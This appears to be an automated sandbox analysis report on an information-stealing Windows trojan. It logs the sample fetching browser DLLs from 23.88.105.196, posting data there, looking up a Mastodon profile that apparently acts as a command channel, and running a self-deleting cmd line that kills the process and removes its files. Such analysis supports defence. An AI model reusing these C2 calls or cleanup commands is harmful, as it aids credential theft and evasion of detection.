Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:10 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:10 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:10 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:10 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp String found in binary or memory: eo Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track versio equals www.facebook.com (Facebook)
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/1008
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/freebl3.dll
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/mozglue.dll
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/mozglue.dll$
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/msvcp140.dll
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/nss3.dll
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/nss3.dllO
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/softokn3.dll
Source: nss3[1].dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3[1].dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nss3[1].dll.1.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nss3[1].dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: nss3[1].dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3[1].dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3[1].dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/plp
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: nss3[1].dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3[1].dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: nss3[1].dll.1.dr String found in binary or memory: http://ocsp.thawte.com0
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp String found in binary or memory: http://service.real.cop
Source: nss3[1].dll.1.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: nss3[1].dll.1.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: nss3[1].dll.1.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: mozglue[1].dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: nss3[1].dll.1.dr String found in binary or memory: http://www.mozilla.com0
Source: temp.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: temp.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: temp.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: temp.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: temp.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtabSQLite
Source: temp.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/tootsuite/mastodon
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp String found in binary or memory: https://joinmastodon.org/apps
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: https://mas.to
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp String found in binary or memory: https://mas.to/
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp String found in binary or memory: https://mas.to/avatars/original/missing.png
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp String found in binary or memory: https://mas.to/users/killern0
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp String found in binary or memory: https://mas.to/users/killern0/followers
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp String found in binary or memory: https://mas.to/users/killern0/following
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: https://media.mas.to
Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp String found in binary or memory: https://media.mas.to/masto-public/site_uploads/files/000/000/003/original/elephant_ui_plane-e3f2d57c
Source: temp.1.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: temp.1.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: nss3[1].dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: temp.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /1008 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: unknown DNS traffic detected: queries for: mas.to
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00410340 DeleteUrlCacheEntry,DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_00410340
Source: global traffic HTTP traffic detected: GET /@killern0 HTTP/1.1Host: mas.to
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.6:49740 version: TLS 1.2

System Summary:

barindex
Uses 32bit PE files
Source: T6zZFfRLqs.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00413270 1_2_00413270
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0041E780 1_2_0041E780
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00498990 1_2_00498990
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0041DBF0 1_2_0041DBF0
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00439000 1_2_00439000
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_004AD033 1_2_004AD033
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_004690E0 1_2_004690E0
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_0049D0F0 1_2_0049D0F0
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00421200 1_2_00421200
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_004982C0 1_2_004982C0
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_004B22EF 1_2_004B22EF
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00450340 1_2_00450340
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00421360 1_2_00421360
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: 1_2_00464400 1_2_00464400
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: String function: 00401020 appears 53 times
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Code function: String function: 0049CF02 appears 36 times
Sample file is different than original file name gathered from version info
Source: T6zZFfRLqs.exe, 00000001.00000003.373993056.00000000030AA000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs T6zZFfRLqs.exe
PE file contains strange resources
Source: T6zZFfRLqs.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: T6zZFfRLqs.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: T6zZFfRLqs.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: T6zZFfRLqs.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: T6zZFfRLqs.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: T6zZFfRLqs.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\T6zZFfRLqs.exe 'C:\Users\user\Desktop\T6zZFfRLqs.exe'
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6 Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "T6zZFfRLqs.exe")
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/18@1/3
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: T6zZFfRLqs.exe, 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: T6zZFfRLqs.exe Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: T6zZFfRLqs.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
